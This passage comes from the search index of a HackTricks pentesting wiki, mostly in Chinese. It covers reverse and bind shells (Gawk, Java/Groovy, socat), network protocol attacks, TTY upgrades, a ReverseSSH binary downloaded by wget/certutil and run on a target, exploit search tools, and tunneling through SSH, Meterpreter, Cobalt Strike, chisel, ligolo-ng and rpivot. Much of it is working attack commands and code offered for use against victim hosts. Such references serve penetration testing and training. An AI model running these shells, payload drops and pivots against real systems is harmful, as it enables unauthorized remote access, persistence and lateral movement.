\\"/0/0\\"\\nwhile (1) {\\ndo {\\nprintf Prompt |& Service\\nService |& getline cmd\\nif (cmd) {\\nwhile ((cmd |& getline) > 0)\\nprint $0 |& Service\\nclose(cmd)\\n}\\n} while (cmd != \\"exit\\")\\nclose(Service)\\n}\\n}","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Gawk","id":"1248","title":"Gawk"},"1249":{"body":"这将尝试连接到您系统的6001端口: bash xterm -display 10.0.0.1:1 要捕获反向 shell,您可以使用(将监听端口 6001): bash # Authorize host\\nxhost +targetip\\n# Listen\\nXnest :1","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Xterm","id":"1249","title":"Xterm"},"125":{"body":"Here are some of the attack tactics that can be used against 802.1X implementations: 通过 EAP 进行 Active brute-force password grinding 利用畸形的 EAP 内容攻击 RADIUS server ** (exploits) EAP 消息捕获并进行 offline password cracking (EAP-MD5 and PEAP) 强制 EAP-MD5 authentication 以绕过 TLS certificate validation 在使用 hub 或类似设备进行认证时注入恶意网络流量 If the attacker if between the victim and the authentication server, he could try to degrade (if necessary) the authentication protocol to EAP-MD5 and capture the authentication attempt. 
Then, he could brute-force this using: eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt","breadcrumbs":"Pentesting Network » EAP 攻击","id":"125","title":"EAP 攻击"},"1250":{"body":"by frohoff 注意:Java 反向 shell 也适用于 Groovy bash String host=\\"localhost\\";\\nint port=8044;\\nString cmd=\\"cmd.exe\\";\\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Groovy","id":"1250","title":"Groovy"},"1251":{"body":"https://highon.coffee/blog/reverse-shell-cheat-sheet/ http://pentestmonkey.net/cheat-sheet/shells/reverse-shell https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://github.com/robiot/rustcat https://github.com/emptymonkey/revsh tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » 参考文献","id":"1251","title":"参考文献"},"1252":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 本页面的目标是提出替代方案,至少允许将本地原始 TCP 端口和本地网页 (HTTP) 暴露到互联网,而无需在其他服务器上安装任何东西(仅在本地需要时)。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » 将本地暴露到互联网","id":"1252","title":"将本地暴露到互联网"},"1253":{"body":"来自 https://serveo.net/ ,它允许多种 HTTP 和端口转发功能 免费 。 bash # Get a random port from serveo.net to expose local port 4444\\nssh -R 0:localhost:4444 serveo.net # Expose a web listening in localhost:300 in a random https URL\\nssh -R 80:localhost:3000 serveo.net","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » Serveo","id":"1253","title":"Serveo"},"1254":{"body":"从 https://www.socketxp.com/download ,它允许暴露 tcp 和 http: bash # Expose tcp port 22\\nsocketxp connect tcp://localhost:22 # Expose http port 8080\\nsocketxp connect http://localhost:8080","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » SocketXP","id":"1254","title":"SocketXP"},"1255":{"body":"来自 https://ngrok.com/ ,它允许暴露 http 和 tcp 端口: bash # Expose web in 3000\\nngrok http 8000 # Expose port in 9000 (it requires a credit card, but you won\'t be charged)\\nngrok tcp 9000","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » Ngrok","id":"1255","title":"Ngrok"},"1256":{"body":"从 https://telebit.cloud/ 它允许暴露 http 和 tcp 端口: bash # Expose web in 3000\\n/Users/username/Applications/telebit/bin/telebit http 3000 # Expose port 
in 9000\\n/Users/username/Applications/telebit/bin/telebit tcp 9000","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » Telebit","id":"1256","title":"Telebit"},"1257":{"body":"来自 https://localxpose.io/ ,它提供多个 http 和端口转发功能 免费 。 bash # Expose web in port 8989\\nloclx tunnel http -t 8989 # Expose tcp port in 4545 (requires pro)\\nloclx tunnel tcp --port 4545","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » LocalXpose","id":"1257","title":"LocalXpose"},"1258":{"body":"从 https://expose.dev/ 它允许暴露 http 和 tcp 端口: bash # Expose web in 3000\\n./expose share http://localhost:3000 # Expose tcp port in port 4444 (REQUIRES PREMIUM)\\n./expose share-port 4444","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » Expose","id":"1258","title":"Expose"},"1259":{"body":"来自 https://github.com/localtunnel/localtunnel ,它允许免费暴露 http: bash # Expose web in port 8000\\nnpx localtunnel --port 8000 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » Localtunnel","id":"1259","title":"Localtunnel"},"126":{"body":"FHRP (First Hop Redundancy Protocol) 是一类网络协议,旨在 创建一个热备冗余路由系统 。使用 FHRP,可以将物理路由器组合成一个逻辑设备,从而提高容错性并帮助分配负载。 Cisco Systems 工程师开发了两种 FHRP 协议:GLBP 和 HSRP。 GLBP & HSRP Attacks","breadcrumbs":"Pentesting Network » FHRP (GLBP & HSRP) Attacks","id":"126","title":"FHRP (GLBP & HSRP) Attacks"},"1260":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Full TTYs » 完整 TTYs","id":"1260","title":"完整 TTYs"},"1261":{"body":"请注意,您在 SHELL 变量中设置的 shell 必须 在 /etc/shells 中 列出 ,否则会出现 The value for the SHELL variable was not found in the /etc/shells file This incident has been reported。此外,请注意,以下代码片段仅在 bash 中有效。如果您在 zsh 中,请在获取 shell 之前通过运行 bash 切换到 bash。 Python bash python3 -c \'import pty; pty.spawn(\\"/bin/bash\\")\' (inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; note 您可以通过执行 stty -a 获取 行 和 列 的 数量 script bash script /dev/null -qc /bin/bash #/dev/null is to not store anything\\n(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; socat bash #Listener:\\nsocat file:`tty`,raw,echo=0 tcp-listen:4444 #Victim:\\nsocat exec:\'bash -li\',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Full TTYs » 完整 TTY","id":"1261","title":"完整 TTY"},"1262":{"body":"python -c \'import pty; 
pty.spawn(\\"/bin/sh\\")\' echo os.system(\'/bin/bash\') /bin/sh -i script -qc /bin/bash /dev/null perl -e \'exec \\"/bin/sh\\";\' perl: exec \\"/bin/sh\\"; ruby: exec \\"/bin/sh\\" lua: os.execute(\'/bin/sh\') IRB: exec \\"/bin/sh\\" vi: :!bash vi: :set shell=/bin/bash:shell nmap: !sh","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Full TTYs » 生成shell","id":"1262","title":"生成shell"},"1263":{"body":"一种方便的 交互式shell访问 、 文件传输 和 端口转发 的方法是将静态链接的ssh服务器 ReverseSSH 放到目标上。 以下是针对x86的示例,使用了upx压缩的二进制文件。有关其他二进制文件,请查看 发布页面 。 在本地准备以捕获ssh端口转发请求: bash # Drop it via your preferred way, e.g.\\nwget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh /dev/shm/reverse-ssh -v -l -p 4444 (2a) Linux 目标: bash # Drop it via your preferred way, e.g.\\nwget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh /dev/shm/reverse-ssh -p 4444 kali@10.0.0.2 (2b) Windows 10 目标(对于早期版本,请查看 project readme ): bash # Drop it via your preferred way, e.g.\\ncertutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe reverse-ssh.exe -p 4444 kali@10.0.0.2 如果 ReverseSSH 端口转发请求成功,您现在应该能够使用默认密码 letmeinbrudipls 登录,前提是以运行 reverse-ssh(.exe) 的用户身份: bash # Interactive shell access\\nssh -p 8888 127.0.0.1 # Bidirectional file transfer\\nsftp -P 8888 127.0.0.1","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Full TTYs » ReverseSSH","id":"1263","title":"ReverseSSH"},"1264":{"body":"Penelope 自动将 Linux 反向 shell 升级为 TTY,处理终端大小,记录所有内容等等。它还为 Windows shell 提供 readline 支持。 penelope","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Full TTYs » Penelope","id":"1264","title":"Penelope"},"1265":{"body":"如果由于某种原因您无法获得完整的 TTY,您 仍然可以与期望用户输入的程序交互 。在以下示例中,密码被传递给 sudo 以读取文件: bash expect -c \'spawn sudo -S cat \\"/root/root.txt\\";expect \\"*password*\\";send 
\\"\\";send \\"\\\\r\\\\n\\";interact\' tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Full TTYs » No TTY","id":"1265","title":"No TTY"},"1266":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Search Exploits » 搜索漏洞","id":"1266","title":"搜索漏洞"},"1267":{"body":"始终在“google”或其他地方搜索: [version] exploit 您还应该尝试 shodan 漏洞搜索 从 https://exploits.shodan.io/ 。","breadcrumbs":"Search Exploits » 浏览器","id":"1267","title":"浏览器"},"1268":{"body":"用于从 exploitdb 控制台搜索服务漏洞。 bash #Searchsploit tricks\\nsearchsploit \\"linux Kernel\\" #Example\\nsearchsploit apache mod_ssl #Other example\\nsearchsploit -m 7618 #Paste the exploit in current directory\\nsearchsploit -p 7618[.c] #Show complete path\\nsearchsploit -x 7618[.c] #Open vi to inspect the exploit\\nsearchsploit --nmap file.xml #Search vulns inside an nmap xml result","breadcrumbs":"Search Exploits » Searchsploit","id":"1268","title":"Searchsploit"},"1269":{"body":"https://github.com/rfunix/Pompem 是另一个搜索漏洞的工具","breadcrumbs":"Search Exploits » Pompem","id":"1269","title":"Pompem"},"127":{"body":"已知存在三种版本的 Routing Information Protocol (RIP):RIP、RIPv2 和 RIPng。RIP 和 RIPv2 通过 UDP 的端口 520 向对等体发送 datagram,而 RIPng 则通过 IPv6 multicast 将 datagram 广播到 UDP 端口 521。RIPv2 引入了对 MD5 认证的支持。另一方面,RIPng 不包含原生认证;它依赖于 IPv6 中可选的 IPsec AH 和 ESP 头。 RIP 和 RIPv2: 
通信通过 UDP datagram 的端口 520 进行。 RIPng: 使用 UDP 端口 521,通过 IPv6 multicast 广播 datagram。 注意 RIPv2 支持 MD5 认证,而 RIPng 不包含原生认证,依赖于 IPv6 中的 IPsec AH 和 ESP 头。","breadcrumbs":"Pentesting Network » RIP","id":"127","title":"RIP"},"1270":{"body":"bash msf> search platform:windows port:135 target:XP type:exploit","breadcrumbs":"Search Exploits » MSF-Search","id":"1270","title":"MSF-Search"},"1271":{"body":"如果没有找到任何内容,请尝试在 https://packetstormsecurity.com/ 中搜索使用的技术。","breadcrumbs":"Search Exploits » PacketStorm","id":"1271","title":"PacketStorm"},"1272":{"body":"您还可以在 vulners 数据库中搜索: https://vulners.com/","breadcrumbs":"Search Exploits » Vulners","id":"1272","title":"Vulners"},"1273":{"body":"此工具在其他数据库中搜索漏洞: https://sploitus.com/","breadcrumbs":"Search Exploits » Sploitus","id":"1273","title":"Sploitus"},"1274":{"body":"类似于 GTFOBins 的策划漏洞列表,按漏洞类型(本地权限提升、远程代码执行等)、服务类型(Web、SMB、SSH、RDP 等)、操作系统和实践实验室(链接到可以玩漏洞的机器)进行过滤: https://sploitify.haxx.it","breadcrumbs":"Search Exploits » Sploitify","id":"1274","title":"Sploitify"},"1275":{"body":"search_vulns 使您能够搜索已知的漏洞和漏洞利用: https://search-vulns.com/ 。它利用了各种数据源,如 NVD、Exploit-DB、GitHub 中的 PoC、GitHub 安全咨询数据库和 endoflife.date。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Search Exploits » search_vulns","id":"1275","title":"search_vulns"},"1276":{"body":"Reading time: 30 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Tunneling and Port Forwarding » Tunneling and Port Forwarding","id":"1276","title":"Tunneling and Port Forwarding"},"1277":{"body":"warning ICMP 和 SYN 扫描无法通过 socks 代理进行隧道传输,因此我们必须 禁用 ping 发现 (-Pn) 并指定 TCP 扫描 (-sT) 以使其工作。","breadcrumbs":"Tunneling and Port Forwarding » Nmap tip","id":"1277","title":"Nmap tip"},"1278":{"body":"Host -> Jump -> InternalA -> InternalB bash # On the jump server connect the port 3333 to the 5985\\nmknod backpipe p;\\nnc -lvnp 5985 0backpipe # On InternalA accessible from Jump and can access InternalB\\n## Expose port 3333 and connect it to the winrm port of InternalB\\nexec 3<>/dev/tcp/internalB/5985\\nexec 4<>/dev/tcp/Jump/3333\\ncat <&3 >&4 &\\ncat <&4 >&3 & # From the host, you can now access InternalB from the Jump server\\nevil-winrm -u username -i Jump","breadcrumbs":"Tunneling and Port Forwarding » Bash","id":"1278","title":"Bash"},"1279":{"body":"SSH 图形连接 (X) bash ssh -Y -C @ #-Y is less secure but faster than -X","breadcrumbs":"Tunneling and Port Forwarding » SSH","id":"1279","title":"SSH"},"128":{"body":"EIGRP (Enhanced Interior Gateway Routing Protocol) 是一种动态路由协议。 它是一个距离向量协议。 如果没有 认证 并且没有将接口配置为被动, 入侵者 可以干扰 EIGRP 路由并导致 路由表被投毒 。此外,EIGRP 网络(即自治系统) 是扁平的,没有任何分区划分 。如果 攻击者注入一条路由 ,这条路由很可能会 在整个自治 EIGRP 系统中传播 。 要攻击 EIGRP 系统,需要 与合法的 EIGRP 路由器建立邻居关系 ,这会打开许多可能性,从基础侦察到各种注入。 FRRouting 允许你实现一个支持 BGP、OSPF、EIGRP、RIP 等协议的 虚拟路由器 。你只需将其部署在攻击者的系统上,就可以在路由域中伪装成合法的路由器。 EIGRP Attacks Coly 具备拦截 EIGRP (Enhanced Interior Gateway Routing Protocol) 广播的能力。它还允许注入数据包,可用于修改路由配置。","breadcrumbs":"Pentesting Network » EIGRP Attacks","id":"128","title":"EIGRP Attacks"},"1280":{"body":"在SSH服务器中打开新端口 --> 其他端口 bash ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in port 10521 from everywhere bash ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in port 10521 from everywhere","breadcrumbs":"Tunneling and Port Forwarding » Local 
Port2Port","id":"1280","title":"Local Port2Port"},"1281":{"body":"本地端口 --> 被攻陷的主机 (SSH) --> 第三方主机:端口 bash ssh -i ssh_key @ -L :: [-p ] [-N -f] #This way the terminal is still in your host\\n#Example\\nsudo ssh -L 631::631 -N -f -l ","breadcrumbs":"Tunneling and Port Forwarding » Port2Port","id":"1281","title":"Port2Port"},"1282":{"body":"本地端口 --> 被攻陷的主机 (SSH) --> 任何地方 bash ssh -f -N -D @ #All sent to local port will exit through the compromised server (use as proxy)","breadcrumbs":"Tunneling and Port Forwarding » Port2hostnet (proxychains)","id":"1282","title":"Port2hostnet (proxychains)"},"1283":{"body":"这对于通过 DMZ 从内部主机获取反向 shell 到您的主机非常有用: bash ssh -i dmz_key -R :443:0.0.0.0:7000 root@10.129.203.111 -vN\\n# Now you can send a rev to dmz_internal_ip:443 and capture it in localhost:7000\\n# Note that port 443 must be open\\n# Also, remmeber to edit the /etc/ssh/sshd_config file on Ubuntu systems\\n# and change the line \\"GatewayPorts no\\" to \\"GatewayPorts yes\\"\\n# to be able to make ssh listen in non internal interfaces in the victim (443 in this case)","breadcrumbs":"Tunneling and Port Forwarding » 反向端口转发","id":"1283","title":"反向端口转发"},"1284":{"body":"您需要 在两个设备上具有root权限 (因为您将创建新的接口),并且sshd配置必须允许root登录: PermitRootLogin yes PermitTunnel yes bash ssh root@server -w any:any #This will create Tun interfaces in both devices\\nip addr add 1.1.1.2/32 peer 1.1.1.1 dev tun0 #Client side VPN IP\\nifconfig tun0 up #Activate the client side network interface\\nip addr add 1.1.1.1/32 peer 1.1.1.2 dev tun0 #Server side VPN IP\\nifconfig tun0 up #Activate the server side network interface 在服务器端启用转发 bash echo 1 > /proc/sys/net/ipv4/ip_forward\\niptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE 在客户端设置新路由 route add -net 10.0.0.0/16 gw 1.1.1.1 note 安全 – Terrapin 攻击 (CVE-2023-48795) 2023年的Terrapin降级攻击可以让中间人篡改早期的SSH握手并将数据注入到 任何转发通道 (-L,-R,-D)。确保客户端和服务器都已打补丁( OpenSSH ≥ 9.6/LibreSSH 6.7 
),或者在依赖SSH隧道之前明确禁用易受攻击的chacha20-poly1305@openssh.com和*-etm@openssh.com算法,在sshd_config/ssh_config中进行设置。","breadcrumbs":"Tunneling and Port Forwarding » VPN-Tunnel","id":"1284","title":"VPN-Tunnel"},"1285":{"body":"您可以通过 ssh 将所有 流量 隧道到 子网络 通过一个主机。 例如,转发所有流量到10.10.10.0/24 bash pip install sshuttle\\nsshuttle -r user@host 10.10.10.10/24 使用私钥连接 bash sshuttle -D -r user@host 10.10.10.10 0/0 --ssh-cmd \'ssh -i ./id_rsa\'\\n# -D : Daemon mode","breadcrumbs":"Tunneling and Port Forwarding » SSHUTTLE","id":"1285","title":"SSHUTTLE"},"1286":{"body":"","breadcrumbs":"Tunneling and Port Forwarding » Meterpreter","id":"1286","title":"Meterpreter"},"1287":{"body":"本地端口 --> 被攻陷的主机(活动会话) --> 第三方主机:端口 bash # Inside a meterpreter session\\nportfwd add -l -p -r ","breadcrumbs":"Tunneling and Port Forwarding » Port2Port","id":"1287","title":"Port2Port"},"1288":{"body":"bash background# meterpreter session\\nroute add # (ex: route add 10.10.10.14 255.255.255.0 8)\\nuse auxiliary/server/socks_proxy\\nrun #Proxy port 1080 by default\\necho \\"socks4 127.0.0.1 1080\\" > /etc/proxychains.conf #Proxychains 另一种方法: bash background #meterpreter session\\nuse post/multi/manage/autoroute\\nset SESSION \\nset SUBNET #Ex: set SUBNET 10.1.13.0\\nset NETMASK \\nrun\\nuse auxiliary/server/socks_proxy\\nset VERSION 4a\\nrun #Proxy port 1080 by default\\necho \\"socks4 127.0.0.1 1080\\" > /etc/proxychains.conf #Proxychains","breadcrumbs":"Tunneling and Port Forwarding » SOCKS","id":"1288","title":"SOCKS"},"1289":{"body":"","breadcrumbs":"Tunneling and Port Forwarding » Cobalt Strike","id":"1289","title":"Cobalt Strike"},"129":{"body":"在 Open Shortest Path First (OSPF) 协议中, MD5 认证通常用于确保路由器之间的安全通信 。然而,这种安全措施可以被 Loki 和 John the Ripper 等工具破坏。这些工具能够捕获并破解 MD5 哈希,从而暴露认证密钥。一旦获取该密钥,就可以用它引入新的路由信息。用于配置路由参数和设置被破解密钥的分别是 Injection 和 Connection 选项卡。 捕获并破解 MD5 哈希: 可以使用 Loki 和 John the Ripper 等工具。 配置路由参数: 通过 Injection 选项卡完成。 设置被破解的密钥: 在 Connection 选项卡中配置。","breadcrumbs":"Pentesting Network » 
OSPF","id":"129","title":"OSPF"},"1290":{"body":"在 teamserver 中打开一个端口,监听所有接口,以便 通过 beacon 路由流量 。 bash beacon> socks 1080\\n[+] started SOCKS4a server on: 1080 # Set port 1080 as proxy server in proxychains.conf\\nproxychains nmap -n -Pn -sT -p445,3389,5985 10.10.17.25","breadcrumbs":"Tunneling and Port Forwarding » SOCKS 代理","id":"1290","title":"SOCKS 代理"},"1291":{"body":"warning 在这种情况下, 端口在信标主机上打开 ,而不是在团队服务器上,流量被发送到团队服务器,然后从那里发送到指定的主机:端口 bash rportfwd [bind port] [forward host] [forward port]\\nrportfwd stop [bind port] 需要注意: Beacon 的反向端口转发旨在 将流量隧道传输到 Team Server,而不是在单个机器之间中继 。 流量在 Beacon 的 C2 流量中隧道传输 ,包括 P2P 链接。 不需要管理员权限 来在高端口上创建反向端口转发。","breadcrumbs":"Tunneling and Port Forwarding » rPort2Port","id":"1291","title":"rPort2Port"},"1292":{"body":"warning 在这种情况下, 端口在 beacon 主机上打开 ,而不是在 Team Server 上, 流量发送到 Cobalt Strike 客户端 (而不是 Team Server),然后从那里发送到指定的主机:端口。 bash rportfwd_local [bind port] [forward host] [forward port]\\nrportfwd_local stop [bind port]","breadcrumbs":"Tunneling and Port Forwarding » rPort2Port 本地","id":"1292","title":"rPort2Port 本地"},"1293":{"body":"https://github.com/sensepost/reGeorg 您需要上传一个网络文件隧道:ashx|aspx|js|jsp|php|php|jsp bash python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp","breadcrumbs":"Tunneling and Port Forwarding » reGeorg","id":"1293","title":"reGeorg"},"1294":{"body":"您可以从 https://github.com/jpillora/chisel 的发布页面下载它。 您需要为客户端和服务器使用 相同的版本 。","breadcrumbs":"Tunneling and Port Forwarding » Chisel","id":"1294","title":"Chisel"},"1295":{"body":"bash ./chisel server -p 8080 --reverse #Server -- Attacker\\n./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client -- Victim\\n#And now you can use proxychains with port 1080 (default) ./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed)\\n./chisel client -v 10.10.10.10:8080 socks #Attacker","breadcrumbs":"Tunneling and Port Forwarding » socks","id":"1295","title":"socks"},"1296":{"body":"bash ./chisel_1.7.6_linux_amd64 
server -p 12312 --reverse #Server -- Attacker\\n./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim","breadcrumbs":"Tunneling and Port Forwarding » 端口转发","id":"1296","title":"端口转发"},"1297":{"body":"https://github.com/nicocha30/ligolo-ng 代理和代理使用相同版本","breadcrumbs":"Tunneling and Port Forwarding » Ligolo-ng","id":"1297","title":"Ligolo-ng"},"1298":{"body":"bash # Start proxy server and automatically generate self-signed TLS certificates -- Attacker\\nsudo ./proxy -selfcert\\n# Create an interface named \\"ligolo\\" -- Attacker\\ninterface_create --name \\"ligolo\\"\\n# Print the currently used certificate fingerprint -- Attacker\\ncertificate_fingerprint\\n# Start the agent with certification validation -- Victim\\n./agent -connect :11601 -v -accept-fingerprint \\n# Select the agent -- Attacker\\nsession\\n1\\n# Start the tunnel on the proxy server -- Attacker\\ntunnel_start --tun \\"ligolo\\"\\n# Display the agent\'s network configuration -- Attacker\\nifconfig\\n# Create a route to the agent\'s specified network -- Attacker\\ninterface_add_route --name \\"ligolo\\" --route /\\n# Display the tun interfaces -- Attacker\\ninterface_list","breadcrumbs":"Tunneling and Port Forwarding » 隧道技术","id":"1298","title":"隧道技术"},"1299":{"body":"bash # Establish a tunnel from the proxy server to the agent\\n# Create a TCP listening socket on the agent (0.0.0.0) on port 30000 and forward incoming TCP connections to the proxy (127.0.0.1) on port 10000 -- Attacker\\nlistener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp\\n# Display the currently running listeners on the agent -- Attacker\\nlistener_list","breadcrumbs":"Tunneling and Port Forwarding » 代理绑定和监听","id":"1299","title":"代理绑定和监听"},"13":{"body":"为现场而建。围绕您而建。 Cyber Helmets 开发并提供有效的网络安全培训,由行业专家主导。 他们的课程超越理论,装备团队深入理解和可操作的技能,使用反映现实世界威胁的自定义环境。有关定制培训的咨询,请通过 这里 联系我们。 他们的培训与众不同之处: 定制内容和实验室 由顶级工具和平台支持 由从业者设计和教授 Courses - Cyber Helmets","breadcrumbs":"HackTricks » 
CyberHelmets","id":"13","title":"CyberHelmets"},"130":{"body":"Above :用于扫描网络流量并查找漏洞的工具 你可以在 这里 找到有关网络攻击的 更多信息 。","breadcrumbs":"Pentesting Network » Other Generic Tools & Sources","id":"130","title":"Other Generic Tools & Sources"},"1300":{"body":"bash # Establish a tunnel from the proxy server to the agent\\n# Create a route to redirect traffic for 240.0.0.1 to the Ligolo-ng interface to access the agent\'s local services -- Attacker\\ninterface_add_route --name \\"ligolo\\" --route 240.0.0.1/32","breadcrumbs":"Tunneling and Port Forwarding » 访问代理的本地端口","id":"1300","title":"访问代理的本地端口"},"1301":{"body":"https://github.com/klsecservices/rpivot 反向隧道。隧道从受害者开始。 在 127.0.0.1:1080 上创建一个 socks4 代理。 bash attacker> python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080 bash victim> python client.py --server-ip --server-port 9999 通过 NTLM 代理 进行枢轴 bash victim> python client.py --server-ip --server-port 9999 --ntlm-proxy-ip --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --password P@ssw0rd bash victim> python client.py --server-ip --server-port 9999 --ntlm-proxy-ip --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45","breadcrumbs":"Tunneling and Port Forwarding » Rpivot","id":"1301","title":"Rpivot"},"1302":{"body":"https://github.com/andrew-d/static-binaries","breadcrumbs":"Tunneling and Port Forwarding » Socat","id":"1302","title":"Socat"},"1303":{"body":"bash victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane\\nattacker> socat FILE:`tty`,raw,echo=0 TCP4::1337","breadcrumbs":"Tunneling and Port Forwarding » 绑定 shell","id":"1303","title":"绑定 